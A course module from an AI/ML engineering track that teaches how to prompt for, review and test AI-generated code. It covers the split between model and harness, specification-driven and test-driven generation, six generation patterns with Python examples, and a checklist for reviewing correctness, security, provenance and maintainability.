AI-Powered Code Generation

AI/ML Engineering Track | Complexity: [MEDIUM] | Time: 4-5 Hours

Reading Time: 4-5 hours

Prerequisites: Modules 1.1-1.5 in this sub-track, basic Git workflow, and comfort running tests locally.

What You’ll Be Able to Do

By the end of this module, you will be able to:

- Design code-generation prompts that state intent, constraints, inputs, outputs, and review expectations clearly enough for another engineer to audit.
- Choose among scaffold, fill-in, translate, refactor, and test-generation patterns without treating any one tool or model as a universal answer.
- Separate the model that produces code from the harness that reads files, applies patches, runs commands, and records evidence.
- Review generated code for correctness, security, provenance, licensing, dependency risk, maintainability, hallucinated APIs, and common AI failure modes before accepting it.
- Build a deterministic generate-review-test loop that turns AI output into ordinary source-controlled engineering work.

Why This Module Matters

AI-powered code generation is not a shortcut around engineering judgment. It is a way to ask a probabilistic system to draft code faster than you could type it, then force that draft through the same evidence loop you would expect from any other change. The durable skill is not “getting code from a model.” The durable skill is turning an uncertain draft into a reviewed, tested, source-controlled patch.

This module deliberately treats tools as rotating examples rather than a scoreboard. Copilot, Cursor, Codex, Claude Code, Gemini Code Assist, Amazon Q Developer, Tabnine, Continue, Aider, and local model harnesses all sit somewhere on the same map: prompt, context, model, harness, generated artifact, review, test, and merge. Module 1.1 owns the Rosetta-stone landscape for these tool families; this module zooms into the generation loop itself. See Module 1.1: AI Coding Tools Landscape when you need the broader tool taxonomy.

Hypothetical scenario: a team asks an assistant to “add CSV import support” to a service. The generated patch adds a parser, a route, a dependency, and tests. The diff looks polished, but the parser accepts arbitrary file paths, the dependency name is one character away from a popular package, and the tests only cover clean input. The failure is not that AI generated code. The failure is that nobody reviewed the generated output as an untrusted draft.

The same pattern appears in smaller tasks. A model can generate a validation function that looks idiomatic but treats None as an empty string. It can update tests by weakening assertions instead of fixing behavior. It can invent a framework method that resembles the real API but does not exist. These are not exotic failures. They are normal consequences of asking a language model to predict useful text from incomplete context.

The engineering response is not fear or blind trust. The response is a disciplined workflow: specify the task, constrain the surface area, generate the smallest useful artifact, inspect the diff, run objective checks, and keep responsibility with the human and the repository. Once you learn that loop, code generation becomes a practical accelerator rather than an invisible source of production risk.

The Mental Model of AI Code Generation

An AI code generator is a text prediction system wrapped in a development harness. The model predicts code, prose, commands, or test cases from the prompt and context it receives. The harness determines what files the model can see, whether it can edit them, whether it can run commands, how patches are applied, and what evidence is shown to the developer. These are independent choices, which is why the same model can feel powerful in one coding tool and clumsy in another.

Keep the distinction sharp. Model quality affects the draft: reasoning depth, code fluency, context use, style matching, and ability to follow constraints. Harness design affects the workflow: file discovery, patch application, command execution, sandboxing, approvals, telemetry, and auditability. A strong model in a weak harness may generate impressive snippets that are hard to apply safely. A modest model in a careful harness may perform well on routine edits because it can read the right files, make a narrow patch, and run the right test.

Prompt + context
      |
      v
Model predicts a draft
      |
      v
Harness applies or presents the draft
      |
      v
Human and repository review the result
      |
      v
Tests, linters, scanners, and diff review produce evidence
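
To make the model and harness separation concrete, here is a minimal Python sketch in which the model is only a callable that returns a draft, and the harness decides which parts of that draft may be applied. The names `Harness`, `writable`, and `fake_model` are hypothetical and exist only for illustration; real tools expose far richer context, approval, and sandboxing controls.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, FrozenSet, List

# Hypothetical model interface: prompt text in, {path: proposed content} out.
Model = Callable[[str], Dict[str, str]]


@dataclass
class Harness:
    """Applies a model's draft only to files the task allows."""

    model: Model
    writable: FrozenSet[str]
    log: List[str] = field(default_factory=list)

    def propose(self, prompt: str) -> Dict[str, str]:
        draft = self.model(prompt)
        accepted: Dict[str, str] = {}
        for path, content in draft.items():
            if path in self.writable:
                accepted[path] = content
                self.log.append(f"accepted {path}")
            else:
                # Out-of-scope edits are recorded for review, not applied.
                self.log.append(f"rejected {path}")
        return accepted


def fake_model(prompt: str) -> Dict[str, str]:
    """Stand-in for a real model call; always returns the same draft."""
    return {
        "src/routes/projects.py": "# draft route\n",
        "requirements.txt": "some-new-package\n",
    }


# Same model, narrow harness: only one file may be touched.
narrow = Harness(fake_model, frozenset({"src/routes/projects.py"}))
patch = narrow.propose("Add a read-only projects route")
```

Swapping `fake_model` for a different callable changes the draft; changing `writable` changes what the draft is allowed to do. The two knobs move independently, which is the point of keeping them separate in your head.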

The output should begin life in your mind as “plausible, untrusted code.” That phrase is useful because it avoids two bad habits. It prevents dismissal of generated code merely because a model wrote it, and it prevents acceptance of generated code merely because it compiles. Plausible drafts deserve evaluation, not automatic approval.

Token prediction is not the same as understanding your system. A model may infer intent from names, comments, adjacent tests, documentation, and common patterns, but it does not own your business rules. If the repository has a domain invariant such as “refunds cannot exceed captured payment,” “deleted accounts remain auditable,” or “tenant identifiers must never be inferred from user input,” you must supply that invariant or verify that it already appears in the local context.

This is why review is non-negotiable. Generated code is often syntactically clean because public examples contain a lot of syntactically clean code. Security posture, edge-case behavior, licensing fit, dependency health, and compatibility with your own conventions are much less visible from syntax alone. The model can produce code that looks mature while hiding exactly the assumptions that matter.

The mental model also explains why generation is strongest on known patterns. CRUD scaffolds, CLI wrappers, data validators, adapters, serializers, test fixtures, migrations, and documentation usually have recognizable shapes. Novel algorithms, ambiguous product behavior, security-sensitive authorization logic, performance-critical trading paths, and compliance-heavy data flows require much more human ownership because the correct answer depends on context that may not be in the prompt.

Treat every generation request as a small contract. The prompt states the work, the context supplies the facts, the model drafts an answer, the harness makes the draft reviewable, and the repository decides whether it is true. When that contract is explicit, AI code generation fits naturally into professional engineering. When the contract is implicit, the tool invents missing terms on your behalf.

Core Concepts

Specification-Driven Generation

Specification-driven generation means you describe the desired behavior before asking for code. This sounds obvious, but vague prompts are still one of the most common reasons generated code wanders. “Generate a function to process data” gives the model permission to invent input shapes, validation rules, output formats, error behavior, performance expectations, and dependency choices. Those inventions may be reasonable in isolation and wrong for your system.

A useful specification names the artifact, inputs, outputs, constraints, edge cases, allowed dependencies, disallowed behavior, and review evidence. You are not trying to write a novel in the prompt. You are trying to remove the degrees of freedom that would be dangerous for the model to guess. The more the task touches security, money, identity, reliability, or compatibility, the more explicit the specification should be.

Poor specification:

Generate a function to process uploaded files.

Better specification:

Generate a Python function named read_user_upload.

Inputs:
- base_dir: pathlib.Path, already created by the service
- user_filename: str, supplied by an untrusted user

Output:
- str containing UTF-8 text from the selected file

Constraints:
- Resolve paths and reject any path outside base_dir.
- Reject absolute paths and parent-directory traversal.
- Limit file size to 1 MiB before reading.
- Raise ValueError for invalid names and FileNotFoundError for missing files.
- Use only the Python standard library.

Evidence:
- Include pytest tests for valid files, traversal attempts, absolute paths,
  missing files, and oversized files.

Notice the difference. The better prompt does not merely ask for a function; it defines what the function is allowed to assume. It also asks for tests that expose the risk area. If the generated implementation later uses open(user_filename) directly, the review has an obvious rejection criterion because the prompt already declared that filenames are untrusted.
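
For reference while reviewing, the following is one possible implementation that would satisfy the better specification. It is a sketch under stated assumptions, not the only acceptable answer: the prompt does not say which exception an oversized file should raise, so `ValueError` is assumed here, and `Path.is_relative_to` requires Python 3.9 or later.

```python
from pathlib import Path

MAX_UPLOAD_BYTES = 1024 * 1024  # 1 MiB, from the prompt's size constraint


def read_user_upload(base_dir: Path, user_filename: str) -> str:
    """Return UTF-8 text from a file inside base_dir; the name is untrusted."""
    if not isinstance(user_filename, str) or not user_filename:
        raise ValueError("filename must be a non-empty string")

    requested = Path(user_filename)
    if requested.is_absolute() or ".." in requested.parts:
        raise ValueError("absolute paths and parent traversal are not allowed")

    base = base_dir.resolve()
    candidate = (base / requested).resolve()
    # resolve() follows symlinks, so a link that points outside base_dir
    # is rejected here as well.
    if not candidate.is_relative_to(base):
        raise ValueError("path escapes the base directory")

    if not candidate.is_file():
        raise FileNotFoundError(user_filename)

    # Assumption: oversized files raise ValueError (the prompt leaves this open).
    if candidate.stat().st_size > MAX_UPLOAD_BYTES:
        raise ValueError("file exceeds the 1 MiB limit")

    return candidate.read_text(encoding="utf-8")
```

A reviewer should still ask what this sketch leaves open: the file could change between the size check and the read, and the undecided exception type for oversized files is exactly the kind of gap to send back into the prompt.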

Specification quality is not only about constraints. It is also about preserving design intent. If you ask a model to “modernize” code without stating which public interfaces must remain stable, it may produce a cleaner implementation that breaks downstream callers. A good refactor prompt says which signatures, response shapes, status codes, environment variables, and file formats must not change.

The review discipline begins before generation. Read your own prompt as if it were a ticket assigned to a teammate. If a responsible engineer could interpret it in several incompatible ways, the model will have the same opening. Tighten the prompt until the desired patch can be judged from the diff and the tests, then generate.

Harness and Model Are Separate Choices

Many developers say “the AI did it” when they really mean a model produced output inside a particular tool. That shorthand hides important engineering choices. A browser chat, an editor assistant, a terminal agent, and a CI-connected agent can all call capable models, but they expose different context and authority. The right question is not “which assistant should I use?” It is “which combination of model and harness matches the risk of this generation task?”

For example, a fill-in-the-middle autocomplete harness may be ideal when you are writing a familiar loop inside a file you already understand. The model sees local context and suggests a small continuation. You accept, edit, or reject the suggestion immediately. The blast radius is small because the harness mostly affects the current buffer, even if the underlying model is strong enough for broader reasoning.

A terminal agent harness changes the calculus. It may inspect the repository, edit multiple files, run tests, install packages, and summarize the result. That authority can be valuable for a cross-file refactor, but the review burden increases. You must check which files changed, whether commands were appropriate, whether dependency updates were justified, and whether the evidence actually supports the claim that the task is complete.

As of 2026-06 (verify before relying on any specifics): public documentation for major coding products describes frequent changes in model menus, billing units, plan limits, and agent capabilities. Treat product facts as a volatile surface over the durable workflow. A model that is available in an IDE today may be renamed, retired, rate-limited, or moved behind a different plan later, while the review loop stays the same.

This separation also helps when a result is poor. If the assistant missed a file, the harness may have lacked context or search capability. If it saw the right file but invented an API, the model may have overgeneralized from similar libraries. If it produced a good patch but changed too many files, the prompt and harness permissions were too broad. Diagnose the failure at the right layer before switching tools.

The Generate-Review-Test Loop

The durable loop is simple enough to memorize: prompt, generate, review, test, revise. The important part is that review happens before you emotionally accept the patch. If you let a polished diff become “the solution” in your mind before checking it, the rest of the process becomes confirmation bias. You start looking for reasons to keep the patch instead of reasons it might be wrong.

flowchart TD
    A[Write task contract] --> B[Provide scoped context]
    B --> C[Generate smallest useful draft]
    C --> D[Review diff and assumptions]
    D --> E{Reject or revise?}
    E -->|Reject| A
    E -->|Revise| F[Patch manually or refine prompt]
    F --> D
    E -->|Looks plausible| G[Run targeted checks]
    G --> H{Evidence passes?}
    H -->|No| I[Debug with failure output]
    I --> D
    H -->|Yes| J[Security and provenance review]
    J --> K{Ready for normal review?}
    K -->|No| D
    K -->|Yes| L[Commit through ordinary workflow]

Run the loop in small increments. A single generated helper function is easier to review than a generated subsystem. A migration of three named files is easier to verify than “update the API layer.” A generated test suite is easier to trust when you can compare it against a written behavior contract. Small loops are usually not slower in practice, because they reduce the cost of discovering that the model took the wrong path.

The first review pass should be silent and skeptical. Read the diff without the assistant’s explanation. Explanations can be useful later, but they can also anchor you to the model’s story. The diff is the artifact that will run in production. Check whether it changes the files you expected, preserves public contracts, introduces dependencies, alters tests, changes error handling, or quietly removes safeguards.

Only after that should you run the evidence. Tests, linters, type checks, static analysis, dependency scanners, and manual smoke tests each answer different questions. A test can prove a behavior for known cases, but it cannot prove the absence of injection risk. A type checker can prove interface consistency, but it cannot prove business correctness. A security scanner can flag known patterns, but it cannot understand every domain invariant.
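
One way to keep that evidence deterministic is to run a fixed set of named checks and record each result separately, rather than trusting a single "all green" summary. The sketch below uses only the standard library. The check names and commands are placeholders (each simply invokes the current Python interpreter so the example runs anywhere); in a real repository you would substitute your own test, lint, and scan commands.

```python
import subprocess
import sys
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class CheckResult:
    name: str
    command: List[str]
    returncode: int
    output: str

    @property
    def passed(self) -> bool:
        return self.returncode == 0


def run_checks(checks: Dict[str, List[str]]) -> List[CheckResult]:
    """Run every check, even after a failure, and keep the raw output."""
    results = []
    for name, command in checks.items():
        proc = subprocess.run(command, capture_output=True, text=True)
        results.append(
            CheckResult(name, command, proc.returncode, proc.stdout + proc.stderr)
        )
    return results


# Placeholder commands: stand-ins for a test runner and a scanner.
example_checks = {
    "unit-tests": [sys.executable, "-c", "print('2 passed')"],
    "dependency-scan": [sys.executable, "-c", "import sys; sys.exit(1)"],
}
evidence = run_checks(example_checks)
failed = [result.name for result in evidence if not result.passed]
```

Keeping one record per check preserves the distinction the paragraph above draws: a passing test run does not excuse a failing scan, and the stored output is something a reviewer can read later.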

Test-Driven Generation

Test-driven generation is one of the safest ways to use AI because it turns vague intent into executable boundaries. Instead of asking the model to produce implementation first, ask for tests from a behavior specification, review those tests, then generate code to pass them. This works because reviewing tests is often easier than reviewing a full implementation. You can ask whether the tests express the behavior you actually want before any implementation bias enters the conversation.

A strong test-generation prompt includes normal cases, boundary cases, invalid inputs, failure modes, and invariants. It also states what not to test. If a function should not call the network, ask for tests that use temporary files or mocks rather than live services. If output order matters, say so. If a legacy bug must remain compatible for now, document that uncomfortable fact in the tests rather than letting the model “fix” it accidentally.

Generate pytest tests for normalize_slug(text: str) -> str.

Behavior:
- Lowercase ASCII letters.
- Replace whitespace and underscores with single hyphens.
- Remove characters outside letters, numbers, and hyphens.
- Collapse repeated hyphens.
- Strip leading and trailing hyphens.
- Raise TypeError for non-string input.

Review requirements:
- Include at least one test for empty input.
- Include at least one test for punctuation-only input.
- Include parametrized tests for common examples.
- Do not change the function signature.

Review the generated tests as carefully as generated implementation. Models sometimes write tests that simply mirror their own planned implementation instead of the specification. They may assert the wrong behavior for edge cases, skip negative tests, or use broad assertions that would pass broken code. If the tests are weak, generating implementation against them only makes the weakness feel official.

Once the tests are reviewed, implementation generation becomes more constrained. The model has executable targets, and you have a concrete way to reject regressions. This does not remove the need for code review, but it reduces the chance that the model optimizes for a pretty happy path while ignoring boundaries. Test-driven generation is especially useful for validators, parsers, formatters, adapters, and compatibility refactors.
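
As an illustration of what reviewed cases for the `normalize_slug` prompt might look like, the sketch below pairs a case table with one candidate implementation. Both are assumptions made for this example: the prompt does not define how non-ASCII letters are handled, so they are removed here, and the table is written as plain data so that it could be passed to `pytest.mark.parametrize` without changes.

```python
import re

# (input, expected) pairs derived from the behavior list in the prompt.
SLUG_CASES = [
    ("Hello World", "hello-world"),
    ("  Hello__World  ", "hello-world"),
    ("snake_case_name", "snake-case-name"),
    ("a - b", "a-b"),
    ("C++ & Rust!", "c-rust"),
    ("", ""),          # empty input
    ("!!!", ""),       # punctuation-only input
    ("Café", "caf"),   # assumption: non-ASCII letters are removed
]

NON_STRING_INPUTS = [None, 42, b"bytes"]


def normalize_slug(text: str) -> str:
    """Candidate implementation; only ASCII letters, digits, and hyphens survive."""
    if not isinstance(text, str):
        raise TypeError("text must be a string")
    slug = re.sub(r"[\s_]+", "-", text)        # whitespace and underscores
    slug = re.sub(r"[^A-Za-z0-9-]", "", slug)  # drop everything else
    slug = slug.lower()
    slug = re.sub(r"-{2,}", "-", slug)         # collapse repeated hyphens
    return slug.strip("-")


def failing_cases():
    """Return the cases the candidate gets wrong (empty list means all pass)."""
    return [
        (text, expected, normalize_slug(text))
        for text, expected in SLUG_CASES
        if normalize_slug(text) != expected
    ]
```

The `Café` row is the kind of case worth arguing about before any implementation exists. If the team wants transliteration instead of removal, that decision belongs in the test table first.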

Generation Patterns

Pattern 1: Scaffold a Known Shape

Scaffolding asks the model to create a standard project shape, module layout, class skeleton, route handler, command-line interface, or service adapter. It helps when the work is structurally repetitive and the risk lies more in missing pieces than in inventing an algorithm. The goal is not to outsource architecture. The goal is to get a complete first draft of a familiar shape that you can prune and harden.

Good scaffolding prompts name the target framework, file boundaries, public interfaces, dependencies, and forbidden extras. They also ask the assistant to leave placeholders where domain decisions are unknown. That last detail matters. A generated scaffold should not silently invent authentication, billing, retry policy, or data retention behavior just because those concepts often appear near the requested framework.

Illustrative example, not endorsement: an IDE agent can scaffold a FastAPI route, Pydantic models, and tests when you point it at an existing route and ask it to follow local conventions. The harness is useful here because it can inspect nearby files. The review burden is to verify that the generated route uses existing middleware, error shapes, dependency injection patterns, and test fixtures instead of creating a parallel mini-framework.

Generate a scaffold for a read-only Projects API endpoint.

Context:
- Follow the style of src/routes/users.py and tests/test_users.py.
- Use the existing auth dependency; do not create new auth helpers.
- Preserve the existing error response format.

Files allowed:
- src/routes/projects.py
- tests/test_projects.py

Evidence:
- Include tests for authorized request, unauthorized request, and missing project.

Reject scaffolds that look complete in the wrong way. A model that adds a new database session factory, custom logger, alternate validation library, and new exception hierarchy may be demonstrating fluency, but it is also increasing integration cost. A useful scaffold should snap into the system you have, not advertise the system the model wishes you had.

Pattern 2: Fill In a Local Gap

Fill-in generation is the smallest and often safest pattern. You provide a function signature, type definitions, adjacent examples, and a clear behavior contract. The model fills the body or completes a narrow block. This pattern fits autocomplete, inline chat, and manual edit modes because the harness does not need broad authority. The surrounding code already supplies most of the context.

The risk is that local context can hide global constraints. A helper may look correct inside one file while violating a convention enforced elsewhere. For example, a generated serializer might return datetime.isoformat() while the API contract requires a trailing Z, or a generated cache key might omit the tenant identifier because the current file did not show multi-tenant behavior. Local generation still needs domain review.

Illustrative example, not endorsement: a local model harness can be a reasonable fit for filling small pure functions when source-code privacy is the primary constraint. The model may be less capable than a hosted frontier model, but the task may not require deep reasoning. The review standard does not change: read the function, run targeted tests, and check edge cases rather than accepting the output because it stayed local.

Fill in the body of parse_duration(value: str) -> int.

Rules:
- Accept "10s", "5m", "2h", and "1d".
- Return seconds as int.
- Reject negative values.
- Reject unknown units.
- Raise TypeError for non-string input and ValueError for malformed strings.
- Do not import external packages.

Small prompts should still include review instructions. Ask the assistant to mention assumptions after the code, not inside the code. If it says “I assumed days are 24 hours” or “I rejected fractional units,” you have a review handle. If those assumptions are wrong, revise the prompt before the function spreads into callers and tests.
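
A fill-in result for the `parse_duration` prompt could look like the sketch below. The assumptions are listed after the code, as the paragraph above recommends, and each one is a choice the prompt did not make: days are 24 hours, zero is accepted, and uppercase units, whitespace, and fractional values are all rejected as malformed.

```python
import re

_UNIT_SECONDS = {"s": 1, "m": 60, "h": 3600, "d": 86400}
_DURATION_RE = re.compile(r"([0-9]+)([a-z])")


def parse_duration(value: str) -> int:
    """Convert strings such as "10s" or "2h" to a number of seconds."""
    if not isinstance(value, str):
        raise TypeError("value must be a string")
    match = _DURATION_RE.fullmatch(value)
    if match is None:
        # Covers negatives ("-5s"), fractions ("1.5h"), and empty strings.
        raise ValueError(f"malformed duration: {value!r}")
    amount, unit = match.groups()
    if unit not in _UNIT_SECONDS:
        raise ValueError(f"unknown unit: {unit!r}")
    return int(amount) * _UNIT_SECONDS[unit]


# Assumptions made by this sketch (not stated in the prompt):
# - "1d" means exactly 24 hours.
# - "0s" is valid and returns 0.
# - Uppercase units, surrounding whitespace, and fractions are malformed.
```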

Pattern 3: Translate Between Languages or Frameworks

Translation asks the model to convert behavior from one language, framework, API version, or library to another. This pattern is attractive because models have seen many equivalent idioms. It is also dangerous because surface similarity can hide semantic differences. A JavaScript function that treats missing values loosely may not translate cleanly into a Python function with strict type expectations. A library migration may preserve names while changing default behavior.

The prompt must state whether you want semantic equivalence, idiomatic style, or a deliberate redesign. Those are different tasks. Semantic equivalence preserves behavior even if the result is not elegant. Idiomatic translation may improve style but risks changing edge cases. Redesign uses the original as inspiration rather than a contract. If you do not choose, the model may choose for you.

Illustrative example, not endorsement: a browser chat can help compare two library APIs before an IDE or terminal harness edits the code. The chat layer is useful for planning because it has no write authority. After planning, a harness with file access can perform the narrow migration. This separation keeps exploratory reasoning away from the patch until you have a concrete task contract.

Translate this Express middleware to FastAPI dependency style.

Preserve behavior:
- Missing Authorization header returns HTTP 401.
- Invalid token returns HTTP 403.
- Valid token returns a UserContext object.
- Do not change token validation semantics.

After the translation:
- List any behavior that could not be preserved exactly.
- Generate tests that compare the old and new behavior cases.

Review translated code against behavior, not appearance. The generated code may look idiomatic while changing default timeouts, exception types, serialization rules, transaction boundaries, or error response formats. When translation touches user-visible behavior, golden tests or fixture-based comparisons are often more valuable than line-by-line confidence.
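
A fixture-based comparison can be sketched without any framework: run the old and new implementations over the same inputs and report every case where the observable outcome differs, including which exception type was raised. The two `is_blank` functions below are hypothetical stand-ins for a loosely typed original and a stricter translation.

```python
from typing import Any, Callable, Iterable, List, Tuple

Outcome = Tuple[str, Any]


def observe(func: Callable[[Any], Any], arg: Any) -> Outcome:
    """Record either the return value or the exception type name."""
    try:
        return ("ok", func(arg))
    except Exception as exc:
        return ("error", type(exc).__name__)


def behavior_differences(
    old: Callable[[Any], Any],
    new: Callable[[Any], Any],
    cases: Iterable[Any],
) -> List[Tuple[Any, Outcome, Outcome]]:
    """Return (case, old outcome, new outcome) for every mismatch."""
    differences = []
    for case in cases:
        before, after = observe(old, case), observe(new, case)
        if before != after:
            differences.append((case, before, after))
    return differences


def legacy_is_blank(value: Any) -> bool:
    """Hypothetical original: treats a missing value as blank."""
    return value is None or str(value).strip() == ""


def translated_is_blank(value: Any) -> bool:
    """Hypothetical translation: looks idiomatic but fails on None."""
    return value.strip() == ""


report = behavior_differences(
    legacy_is_blank, translated_is_blank, ["", "  ", "text", None]
)
```

Here `report` contains only the `None` case, which is exactly the loosely handled missing value that a line-by-line read of the translation is likely to miss.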

Pattern 4: Refactor Under Constraints

Refactoring with AI is powerful because the assistant can find repetitive patterns and propose a cleaner structure quickly. It is risky because “make this better” is an invitation to alter architecture, public contracts, and tests at the same time. A refactor prompt should sound strict: preserve behavior, name allowed files, state the intended design change, and forbid unrelated cleanup.

Good AI refactors are narrow enough that the diff tells a coherent story. Extract duplicate validation into one helper. Rename a type across a small package. Replace a deprecated API in three files. Split a long function while preserving inputs and outputs. These tasks give the model room to help without granting permission to redesign the system.

Illustrative example, not endorsement: a terminal agent is useful for refactors when it can run the relevant tests after each patch. The harness advantage is the evidence loop, not the mere ability to edit many files. If the terminal agent changes test expectations to make failures disappear, that is not a successful refactor. It is a review failure that should be rejected.

Refactor duplicate email validation into a shared helper.

Allowed files:
- src/users/validation.py
- src/admin/validation.py
- tests/test_user_validation.py

Must preserve:
- Public function names.
- Exception classes.
- Error message strings.
- Existing test behavior.

Do not:
- Add dependencies.
- Reformat unrelated code.
- Change authorization checks.

The review pass for refactors should start with the public contract. Check signatures, response shapes, exception types, error messages, exported names, database migrations, and configuration keys. Then check whether tests were strengthened or weakened. A generated refactor that deletes edge-case tests may look smaller, but it has reduced your evidence.

Pattern 5: Generate Tests and Review the Tests

Test generation is a first-class pattern, not a chore delegated after implementation. Models are often good at enumerating normal cases, obvious boundaries, and simple invalid inputs. They are less reliable at discovering domain-specific invariants unless you state them. A stronger use is to ask for a broad draft, then review and edit the tests until they express your real contract.

Ask for test categories instead of only a target coverage number. Coverage can be gamed with shallow assertions. Categories force useful thinking: happy path, empty input, malformed input, boundary values, permission failures, timeout behavior, duplicate data, concurrency assumptions, and regression cases. If a generated test does not explain what behavior it protects, improve it before trusting it.

Illustrative example, not endorsement: Copilot-style inline completion can be effective when you are writing parameterized tests and the next cases follow a visible pattern. The harness is low authority, so the main review task is checking that each generated case is meaningful. An agentic harness may be better when tests require fixtures across several files, but the diff review burden rises accordingly.

Generate pytest tests for this function.

Focus on behavior, not implementation:
- Valid input with normal values.
- Empty input.
- Boundary values around the maximum size.
- Invalid types.
- Security-sensitive malformed input.
- A regression case for issue #123 if the issue context is present.

Do not:
- Assert private helper calls.
- Mock the function under test.
- Change existing tests to pass the new implementation.

Review generated tests for three anti-patterns. First, tautological tests that reimplement the same logic as the function under test. Second, broad assertions such as “result is not None” when the contract requires a specific value. Third, tests that bless generated behavior you never requested. A test suite can make a wrong assumption durable, so treat generated tests as design artifacts.
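
The anti-patterns are easier to spot with a deliberately broken function in hand. In the sketch below, `buggy_clamp` is a hypothetical implementation that forgets its upper bound. Each check is written as a plain function that returns `True` when it would pass, so the three styles can be compared side by side.

```python
from typing import Callable

Clamp = Callable[[int], int]


def correct_clamp(value: int) -> int:
    """Contract: keep value within 0..100."""
    return min(100, max(0, value))


def buggy_clamp(value: int) -> int:
    """Hypothetical generated code: the upper bound is missing."""
    return max(0, value)


def broad_check(clamp: Clamp) -> bool:
    # Anti-pattern: passes for almost any implementation.
    return clamp(150) is not None


def tautological_check(clamp: Clamp) -> bool:
    # Anti-pattern: recomputes the expectation with the same (buggy) logic.
    value = 150
    expected = max(0, value)
    return clamp(value) == expected


def contract_check(clamp: Clamp) -> bool:
    # Asserts specific values taken from the written contract.
    return clamp(-5) == 0 and clamp(42) == 42 and clamp(150) == 100


results = {
    check.__name__: (check(buggy_clamp), check(correct_clamp))
    for check in (broad_check, tautological_check, contract_check)
}
```

Only `contract_check` rejects the buggy function. The tautological check does something worse than miss the bug: it fails the correct implementation, which is how a generated test can make a wrong assumption durable.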

Pattern 6: Generate Documentation From Reviewed Code

Documentation generation is useful when the code is already reviewed and stable. Models can summarize parameters, examples, error behavior, and usage patterns quickly. The danger is that documentation can become more confident than the code. If the model invents guarantees, performance properties, compatibility promises, or security claims, the docs become a source of future bugs.

Ask documentation prompts to cite the code locations they are summarizing and to mark uncertainty. For public docs, require examples that actually run. For internal docs, require operational caveats such as configuration, failure modes, and test commands. Documentation generated from unreviewed code should be labeled as draft because it may simply explain a bug elegantly.

Illustrative example, not endorsement: a chat tool with read-only repository context is often enough for documentation drafting. You do not need a write-capable agent to explain a stable API. Keeping the harness read-only can be a deliberate safety choice when the task is understanding and prose rather than code modification.

Draft documentation for the reviewed parse_duration function.

Include:
- Purpose.
- Accepted input format.
- Return value.
- Exceptions.
- Three executable examples.
- One warning about unsupported fractional units.

Do not:
- Claim performance guarantees.
- Mention units not supported by the code.
- Describe future behavior as current behavior.

The review discipline for generated documentation is factual verification. Run examples, compare each claim to code, remove marketing language, and avoid implying support for cases that are not tested. Documentation is part of the product surface. Generated prose can mislead users just as generated code can mislead maintainers.
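
Running documented examples can be automated with the standard library's `doctest` module. The sketch below checks a single function's docstring examples against its actual behavior. Both functions are hypothetical; the second one carries a docstring that promises fractional support the code does not provide, which is the kind of overconfident documentation described above.

```python
import doctest
from typing import Callable


def minutes_to_seconds(minutes: int) -> int:
    """Convert whole minutes to seconds.

    >>> minutes_to_seconds(5)
    300
    """
    return int(minutes) * 60


def minutes_to_seconds_overclaimed(minutes: int) -> int:
    """Convert minutes to seconds, including fractional minutes.

    >>> minutes_to_seconds_overclaimed(1.5)
    90
    """
    return int(minutes) * 60  # truncates, so the documented example is false


def documented_examples_pass(func: Callable) -> bool:
    """Run the examples in func's docstring; True if none fail."""
    parser = doctest.DocTestParser()
    test = parser.get_doctest(
        func.__doc__, {func.__name__: func}, func.__name__, None, 0
    )
    runner = doctest.DocTestRunner(verbose=False)
    # Discard the failure report here; a real check would surface it.
    result = runner.run(test, out=lambda text: None)
    return result.failed == 0
```

`documented_examples_pass(minutes_to_seconds)` succeeds, while the overclaimed variant fails because the documented result does not match what the code returns. A check like this only covers claims that are written as examples, so prose guarantees still need a human read.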

Reviewing Generated Output

Reviewing generated output is the core skill of this module. The review should be structured because unstructured review tends to follow whatever the assistant emphasized. A generated summary might say “added validation and tests,” but your review needs to ask which validation, which tests, which files, which dependencies, and which assumptions changed. The assistant’s summary is a starting point, not evidence.

Begin with scope. Run git status --short and inspect the file list before reading individual lines. Generated code sometimes touches formatting, lockfiles, generated artifacts, unrelated tests, or configuration because the harness had broad write access. If the file list is wrong, stop there. A beautiful implementation in the wrong files is still the wrong patch.
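
The scope check can be made mechanical by comparing the changed paths against the files the task was allowed to touch. The sketch below parses text in the two-character-status layout that `git status --short` prints. It is deliberately simplified: it assumes unquoted paths and handles renames only in the `old -> new` form, and the allowed-file list is a hypothetical example.

```python
from typing import Iterable, List


def changed_paths(status_output: str) -> List[str]:
    """Extract paths from short-format status lines such as ' M src/app.py'."""
    paths = []
    for line in status_output.splitlines():
        if len(line) < 4:
            continue
        path = line[3:]  # skip the two status characters and the space
        if " -> " in path:
            # Renames are shown as "old -> new"; keep the new path.
            path = path.split(" -> ", 1)[1]
        paths.append(path)
    return paths


def out_of_scope(status_output: str, allowed: Iterable[str]) -> List[str]:
    """Return changed paths that the task contract did not allow."""
    allowed_set = set(allowed)
    return [path for path in changed_paths(status_output) if path not in allowed_set]


# Hypothetical status text, as it might look after an agent run.
sample_status = (
    " M src/users/validation.py\n"
    "?? src/shared/email_helper.py\n"
    "M  package-lock.json\n"
)
allowed_files = ["src/users/validation.py", "src/admin/validation.py"]
unexpected = out_of_scope(sample_status, allowed_files)
```

A non-empty `unexpected` list is a reason to stop and ask why those files changed before reading a single line of the implementation.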

Then inspect the diff for contract changes. Public APIs, schemas, response formats, error messages, database queries, permissions, environment variables, and configuration defaults deserve special attention. Models often “simplify” awkward compatibility behavior because they do not know who depends on it. If compatibility matters, the prompt should have said so, but the review must catch it regardless.

Correctness review asks whether the code implements the intended behavior for normal, boundary, and invalid cases. Read conditionals carefully. Check off-by-one logic, empty collections, missing keys, time zones, Unicode handling, concurrency assumptions, integer overflow in languages where it matters, and resource cleanup. Models frequently produce code that handles the central example and neglects the edges around it.

Security review asks whether generated code accepts untrusted input, builds queries, shells out, reads files, writes files, parses archives, handles secrets, changes permissions, or adds dependencies. These are review hotspots. A generated function that only formats a string may need light review. A generated function that processes user-supplied file paths needs path normalization, base-directory enforcement, size limits, and tests for traversal attempts.

Provenance review asks where the code and dependencies came from. Generated code may be generic enough to be ordinary, but exact-looking snippets, unusual comments, distinctive algorithms, or large blocks matching a known project should trigger investigation. Dependency suggestions require special skepticism because models can hallucinate package names, choose abandoned packages, or propose names close to legitimate libraries. Verify package identity from official registries and project pages before installing.

Maintainability review asks whether the code fits the local style. Does it use existing helpers, logging conventions, error types, tracing patterns, dependency injection, and test fixtures? Does it create a new abstraction where a local one already exists? Does it hide complexity behind clever code that the team will struggle to debug? AI-generated code can be too generic because it has learned average code, while your repository needs local code.

